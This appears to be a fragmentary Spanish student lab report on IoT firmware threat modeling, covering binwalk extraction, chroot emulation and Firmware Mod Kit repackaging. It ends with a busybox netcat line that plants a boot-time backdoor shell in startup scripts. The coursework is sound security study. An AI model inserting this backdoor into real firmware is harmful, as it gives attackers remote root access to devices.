Documentos de Académico
Documentos de Profesional
Documentos de Cultura
Integrantes:
Docente:
Alber Oswaldo Montoya Benítez
Universidad de Medellín
Facultad de Ingeniería
Ingeniería de Telecomunicaciones
2023
Parte 1: Realización de actividades de modelado de amenazas para evaluar el
firmware del dispositivo IoT
Paso 1: Configure el entorno y abra una ventana de terminal.
Respuesta: Device
Respuesta: Squashfs
Paso 4: Examine la salida del comando binwalk.
¿Cuál es el significado de este tipo de sistema de archivos? Realice una búsqueda en la web
para encontrar más información.
Respuesta: iotdev_firmware.bin.extracted
¿Cuál es el nombre del nuevo directorio dentro de este subdirectorio? ¿Qué comando
usaste para determinar eso?
Copie este archivo en el directorio de trabajo actual, que debería ser squash-fs-root:
Intente ejecutar bin /busybox y otros binarios sin QEMU y observe que no tendrán éxito:
Inicie un nuevo shell dentro del directorio squashfs-root con el siguiente comando:
¿Cómo cambió el aviso?
Respuesta: Ahora muestra la ruta como '/' seguida de # para el indicador
raíz
¿Cuál es el camino actual?
Mire otros programas/binarios en los directorios bin y sbin. Intente ejecutar al menos otros
3 programas y documente sus resultados. Escriba 'salir' cuando haya completado la
exploración para salir del caparazón.
4. ¿Cuál es el nombre del programa que los piratas informáticos podrían usar para
modificar el firmware con una puerta trasera y volver a empaquetarlo en otro
binario de firmware? ¿Existe este programa en el sistema operativo Kali Linux que
está utilizando?
Firmware Mod Kit es una herramienta escrita por Jeremy Collake y Craig
Heffner. Usando FMK, como se le llama popularmente, puede extraer una
imagen de firmware, agregar su propio código y crear una nueva versión del
firmware.
Para agregar la puerta trasera, podemos agregar la siguiente línea en
cualquiera de los archivos .sh, que se puede activar automáticamente al
iniciar el dispositivo.
/bin/busybox nc –nlp 12345 –e /bin/busybox sh &